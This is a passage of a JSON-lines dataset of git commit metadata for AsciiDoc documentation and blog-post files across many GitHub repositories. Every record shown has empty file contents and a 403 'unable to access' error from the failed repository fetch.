403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c00f99369910026cee6c35ab1d490a812304f4b0","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/10\/22\/deref.adoc","new_file":"content\/news\/2021\/10\/22\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"86772b22c745130d337110734a391de0b630b73b","subject":"Update 2017-05-30-Epoch-64-bit-compiler-progress.adoc","message":"Update 2017-05-30-Epoch-64-bit-compiler-progress.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-05-30-Epoch-64-bit-compiler-progress.adoc","new_file":"_posts\/2017-05-30-Epoch-64-bit-compiler-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20b3d5191c5b17321f04e5aea231d9023944562c","subject":"[doc] corrected superuser ACL flag name","message":"[doc] corrected superuser ACL flag name\n\nChange-Id: I514d32b1a631220746b778fd19b2c2db382f8cf8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6783\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3191fb1872310ae267baf4334d109483770a9387","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98a0ab30b94bcb44c93d40a1704fc861b6aa9643","subject":"Update 2016-03-29-First-Post.adoc","message":"Update 2016-03-29-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-03-29-First-Post.adoc","new_file":"_posts\/2016-03-29-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"226b9b4b2cc7a12149da4b19d401f4aca38a9932","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07b9e119515c412fdde1d37d69fe73b757a2a457","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f78463db5b3927abbc260b394752f6ce26cfe3b7","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e32413e27cba40fafbdce34a17357315e9b1986","subject":"create post The Black Friday Deals They Won't Show You...","message":"create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Black-Friday-Deals-They-Wont-Show-You....adoc","new_file":"_posts\/2018-02-26-The-Black-Friday-Deals-They-Wont-Show-You....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"778783838f0ee1008abb3af02c89047e3d1a0bc3","subject":"Update 2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62683067934ed1e7f2e4bd76a674e3dbecdb5ded","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44528c4bf312b67c2493b39b1fc76ae36f6842cc","subject":"Update 2016-02-15-Hello-World.adoc","message":"Update 2016-02-15-Hello-World.adoc","repos":"thykka\/thykka.github.io,thykka\/thykka.github.io,thykka\/thykka.github.io,thykka\/thykka.github.io","old_file":"_posts\/2016-02-15-Hello-World.adoc","new_file":"_posts\/2016-02-15-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thykka\/thykka.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0413b19b5c643ff8b511b7e781056df592f1e949","subject":"Update 2016-03-17-Hello-world.adoc","message":"Update 2016-03-17-Hello-world.adoc","repos":"quangpc\/quangpc.github.io,quangpc\/quangpc.github.io,quangpc\/quangpc.github.io,quangpc\/quangpc.github.io","old_file":"_posts\/2016-03-17-Hello-world.adoc","new_file":"_posts\/2016-03-17-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quangpc\/quangpc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"566afcc8edde53904aef66d8e8bdc88d938d3ff2","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67d5f172caf193ad53bfc363161468671e3d9589","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/5\/deref.adoc","new_file":"content\/news\/2021\/11\/5\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b91993f2a101f57202dbbe1a9d31e5a200409344","subject":"y2b create post The World's Most Dangerous iPhone Case","message":"y2b create post The World's Most Dangerous iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-28-The%20World's%20Most%20Dangerous%20iPhone%20Case.adoc","new_file":"_posts\/2017-12-28-The%20World's%20Most%20Dangerous%20iPhone%20Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e88d4ebaca54ee76413b1d85241db0602674d2fc","subject":"Update 2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","message":"Update 2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","new_file":"_posts\/2020-01-09-Thinking-about-becoming-a-Neo4j-partner-You-may-want-to-read-this.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62941c26c6105d96738024a9124317a44ca75773","subject":"add post for ParisJUG 20161115","message":"add post for ParisJUG 20161115\n","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2016-11-16-ParisJUG-Des-builds-incroyablement-rapides-avec-Gradle-Quoi-de-neuf-JEE.adoc","new_file":"_posts\/2016-11-16-ParisJUG-Des-builds-incroyablement-rapides-avec-Gradle-Quoi-de-neuf-JEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b793fcb71b4a26a43dc11772f89b6b9613527664","subject":"Move user groups from confluence","message":"Move user groups from confluence\n","repos":"clojure\/clojure-site","old_file":"content\/community\/user_groups.adoc","new_file":"content\/community\/user_groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d0fc64d0dd5e67c6a0e305c8489f2d84ff318dde","subject":"[THORN-2494] provide minimal documentation for the \"cli\" fraction","message":"[THORN-2494] provide minimal documentation for the \"cli\" fraction\n","repos":"wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core","old_file":"fractions\/wildfly\/cli\/README.adoc","new_file":"fractions\/wildfly\/cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02eb3c9a5b62284e0b2383c1397d5869b6887589","subject":"Update 2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","message":"Update 2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","new_file":"_posts\/2017-05-31-Base-Class-Library-vs-CLR-Core-Fx-vs-Core-Clr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57cec447058118df7875eab1fed516cbaf0aac64","subject":"Added integration with hypothes.is annotation service to developer manual","message":"Added integration with hypothes.is annotation service to developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55d313af3eea53158cc29a2c703a01ee93dafad6","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0af85f9491521358bf6288a20f5ccf8130923661","subject":"Update 2016-07-02-Smart-Phone-repair.adoc","message":"Update 2016-07-02-Smart-Phone-repair.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-07-02-Smart-Phone-repair.adoc","new_file":"_posts\/2016-07-02-Smart-Phone-repair.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca2c170cb9ae9c86445670aa7f3565e275ffc8b","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27f184689ff1e15c1d3f1f47b973b501cca3f67e","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/08\/deref.adoc","new_file":"content\/news\/2022\/04\/08\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2d7cb028f8c4af07c3bdd2d4ef1d6fa78ed5fd72","subject":"add clojureD 2018","message":"add clojureD 2018\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/clojured.adoc","new_file":"content\/events\/2018\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"94b066bb3623ee386f24e1ac567303cdd5ee91a6","subject":"[docs] Fix error gflags","message":"[docs] Fix error gflags\n\nChange-Id: Id7d846fbacdd294b13139cfc17dba095aae7aa3e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12023\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a92f32b37e1703f24e33be402d3cc06b849c3106","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e164c429088db9796f6bd9f215e87457dd6fa63d","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12122635324c74e45ce6663de10e8bab81f7d7c2","subject":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"350f0751324943dd11d3a8a34eb607b87116dc53","subject":"Update 2016-03-03-Episode-48-Jarful-Meaty-Prickly-Pinball-Discussion.adoc","message":"Update 2016-03-03-Episode-48-Jarful-Meaty-Prickly-Pinball-Discussion.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-03-03-Episode-48-Jarful-Meaty-Prickly-Pinball-Discussion.adoc","new_file":"_posts\/2016-03-03-Episode-48-Jarful-Meaty-Prickly-Pinball-Discussion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e999c7ae581787ab1e0c7e913f4e05e05d7663b","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7b81267d3b610dbe7ce77ccd695b5de2ec29833","subject":"Update 2017-01-03-Sim-Neuron-A-simplified-neural-computational-model.adoc","message":"Update 2017-01-03-Sim-Neuron-A-simplified-neural-computational-model.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2017-01-03-Sim-Neuron-A-simplified-neural-computational-model.adoc","new_file":"_posts\/2017-01-03-Sim-Neuron-A-simplified-neural-computational-model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7ffb39e8cb238e49b62ed37719b2d2332344cd9","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c3027729e7e049e61c167c44a9b185a9f3958e4","subject":"[DOCS] Make snapshot repository examples consistent","message":"[DOCS] Make snapshot repository examples consistent\n","repos":"socialrank\/elasticsearch,spiegela\/elasticsearch,franklanganke\/elasticsearch,ydsakyclguozi\/elasticsearch,SergVro\/elasticsearch,hirdesh2008\/elasticsearch,javachengwc\/elasticsearch,AshishThakur\/elasticsearch,coding0011\/elasticsearch,Shekharrajak\/elasticsearch,sreeramjayan\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,kimimj\/elasticsearch,Fsero\/elasticsearch,sarwarbhuiyan\/elasticsearch,MjAbuz\/elasticsearch,golubev\/elasticsearch,socialrank\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,trangvh\/elasticsearch,iantruslove\/elasticsearch,iamjakob\/elasticsearch,liweinan0423\/elasticsearch,golubev\/elasticsearch,martinstuga\/elasticsearch,SergVro\/elasticsearch,fforbeck\/elasticsearch,luiseduardohdbackup\/elasticsearch,boliza\/elasticsearch,abibell\/elasticsearch,yynil\/elasticsearch,ulkas\/elasticsearch,winstonewert\/elasticsearch,mohit\/elasticsearch,schonfeld\/elasticsearch,nellicus\/elasticsearch,JSCooke\/elasticsearch,weipinghe\/elasticsearch,bestwpw\/elasticsearch,jsgao0\/elasticsearch,hafkensite\/elasticsearch,episerver\/elasticsearch,kevinkluge\/elasticsearch,kingaj\/elasticsearch,petmit\/elasticsearch,mbrukman\/elasticsearch,kaneshin\/elasticsearch,humandb\/elasticsearch,mkis-\/elasticsearch,zhiqinghuang\/elasticsearch,szroland\/elasticsearch,janmejay\/elasticsearch,linglaiyao1314\/elasticsearch,kubum\/elasticsearch,fooljohnny\/elasticsearch,queirozfcom\/elasticsearch,ivansun1010\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,Liziyao\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,Asimov4\/elasticsearch,mcku\/elasticsearch,tsohil\/elasticsearch,glefloch\/elasticsearch,kevinkluge\/elasticsearch,djschny\/elasticsearch,markllama\/elasticsearch,queirozfcom\/elasticsearch,mute\/elasticsearch,dataduke\/elasticsearch,sjohnr\/elasticsearch,ouyangkongtong\/elasticsearch,hanswang\/elasticsearch,tahaemin\/elasticsearch,sauravmondallive\/elasticsearch,Asimov4\/elasticsearch,tsohil\/elasticsearch,dpursehouse\/elasticsearch,masaruh\/elasticsearch,wimvds\/elasticsearch,masaruh\/elasticsearch,huanzhong\/elasticsearch,obourgain\/elasticsearch,ImpressTV\/elasticsearch,robin13\/elasticsearch,liweinan0423\/elasticsearch,KimTaehee\/elasticsearch,wittyameta\/elasticsearch,robin13\/elasticsearch,C-Bish\/elasticsearch,lks21c\/elasticsearch,ESamir\/elasticsearch,Liziyao\/elasticsearch,elancom\/elasticsearch,bestwpw\/elasticsearch,Chhunlong\/elasticsearch,lzo\/elasticsearch-1,iamjakob\/elasticsearch,njlawton\/elasticsearch,yuy168\/elasticsearch,iamjakob\/elasticsearch,IanvsPoplicola\/elasticsearch,rento19962\/elasticsearch,ajhalani\/elasticsearch,hydro2k\/elasticsearch,sauravmondallive\/elasticsearch,elancom\/elasticsearch,davidvgalbraith\/elasticsearch,fred84\/elasticsearch,Uiho\/elasticsearch,Liziyao\/elasticsearch,overcome\/elasticsearch,phani546\/elasticsearch,infusionsoft\/elasticsearch,petabytedata\/elasticsearch,abhijitiitr\/es,masterweb121\/elasticsearch,mikemccand\/elasticsearch,milodky\/elasticsearch,martinstuga\/elasticsearch,coding0011\/elasticsearch,winstonewert\/elasticsearch,yynil\/elasticsearch,golubev\/elasticsearch,KimTaehee\/elasticsearch,MisterAndersen\/elasticsearch,jsgao0\/elasticsearch,sc0ttkclark\/elasticsearch,cnfire\/elasticsearch-1,mkis-\/elasticsearch,jango2015\/elasticsearch,wbowling\/elasticsearch,trangvh\/elasticsearch,caengcjd\/elasticsearch,socialrank\/elasticsearch,beiske\/elasticsearch,thecocce\/elasticsearch,jeteve\/elasticsearch,alexbrasetvik\/elasticsearch,yuy168\/elasticsearch,LewayneNaidoo\/elasticsearch,overcome\/elasticsearch,micpalmia\/elasticsearch,Shekharrajak\/elasticsearch,KimTaehee\/elasticsearch,palecur\/elasticsearch,JervyShi\/elasticsearch,jimhooker2002\/elasticsearch,iantruslove\/elasticsearch,apepper\/elasticsearch,brandonkearby\/elasticsearch,markllama\/elasticsearch,iamjakob\/elasticsearch,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,cnfire\/elasticsearch-1,mcku\/elasticsearch,drewr\/elasticsearch,lmtwga\/elasticsearch,caengcjd\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,vroyer\/elassandra,henakamaMSFT\/elasticsearch,martinstuga\/elasticsearch,himanshuag\/elasticsearch,combinatorist\/elasticsearch,beiske\/elasticsearch,hechunwen\/elasticsearch,SergVro\/elasticsearch,elasticdog\/elasticsearch,camilojd\/elasticsearch,dataduke\/elasticsearch,mmaracic\/elasticsearch,lchennup\/elasticsearch,masterweb121\/elasticsearch,avikurapati\/elasticsearch,bawse\/elasticsearch,Microsoft\/elasticsearch,amaliujia\/elasticsearch,marcuswr\/elasticsearch-dateline,mgalushka\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,humandb\/elasticsearch,elasticdog\/elasticsearch,sdauletau\/elasticsearch,brwe\/elasticsearch,mapr\/elasticsearch,Rygbee\/elasticsearch,onegambler\/elasticsearch,tebriel\/elasticsearch,infusionsoft\/elasticsearch,nknize\/elasticsearch,Kakakakakku\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,kingaj\/elasticsearch,jimhooker2002\/elasticsearch,vrkansagara\/elasticsearch,mapr\/elasticsearch,codebunt\/elasticsearch,xuzha\/elasticsearch,TonyChai24\/ESSource,petmit\/elasticsearch,a2lin\/elasticsearch,camilojd\/elasticsearch,Liziyao\/elasticsearch,djschny\/elasticsearch,Uiho\/elasticsearch,lchennup\/elasticsearch,winstonewert\/elasticsearch,tkssharm